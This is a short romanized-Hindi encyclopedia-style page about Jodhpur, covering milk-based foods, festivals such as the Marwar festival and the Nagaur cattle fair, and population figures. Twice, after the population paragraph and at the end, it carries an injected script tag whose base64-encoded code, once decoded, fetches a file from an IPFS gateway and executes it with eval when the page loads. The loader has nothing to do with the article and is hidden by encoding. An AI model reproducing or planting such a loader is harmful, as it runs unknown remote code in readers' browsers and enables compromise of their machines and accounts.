[[chitr:Mehrangarh-Fort-Jodhpur-27.jpg|thumb|250px|meharanagadh qila, jodhapur ]] yahaan khasataur par doodh nirmit khady padarthoan ka jh‍yada prayog hota hai. jaise mava ka laddoo, krim yukh‍t lash‍si, mava kachau di, aur doodh phirani adi.

uth‍sav

  • jodhapur mean kuchh pramukh utsav hai jo b de hi dhoom-dham se manaya jata hai.
  • marava d uth‍sav, nagaur ka prasiddh pashu mela, kaga mean shitalamata ka uth‍sav aur pipar ka ganguar mela.

janasankhya

jodhapur shahar ki janasankhya 2001 8,46,408 hai. aur jodhapur zile ki kul janasankhya 28,80,777 hai. <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>